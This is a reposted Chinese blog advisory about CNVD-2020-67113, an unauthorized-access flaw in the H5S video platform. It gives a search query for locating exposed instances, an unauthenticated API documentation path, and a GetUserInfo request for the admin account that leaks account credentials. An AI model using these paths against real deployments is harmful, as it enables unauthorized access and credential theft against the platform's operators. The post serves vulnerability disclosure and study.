零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113

初岄

2024-03-24 帮助7人

此文章仅供用于学习研究，严禁用于非法用途，否则后果自负。

零视技术(上海)有限公司是以领先的视频技术服务于客户，致力于物联网视频开发简单化，依托于HTML5 WebRTC 等新的技术，实现全平台视频播放简单化。零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口，执行未授权操作。

零视科技 H5S视频平台

title="H5S视频平台|WEB"

登录页面

学新通

API文档可以未授权访问

/doc/api.html

学新通

存在用户账号密码泄漏的接口

/api/v1/GetUserInfo?user=admin&session=

这篇好文章是转载于：学新通技术网

版权申明：本站部分内容来自互联网，仅供学习及演示用，请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系，请提供相关证据及您的身份证明，我们将在收到邮件后48小时内删除。
本站站名：学新通技术网
本文地址： /boutique/detail/tanhfhkhge

系列文章

photoshop保存的图片太大微信发不了怎么办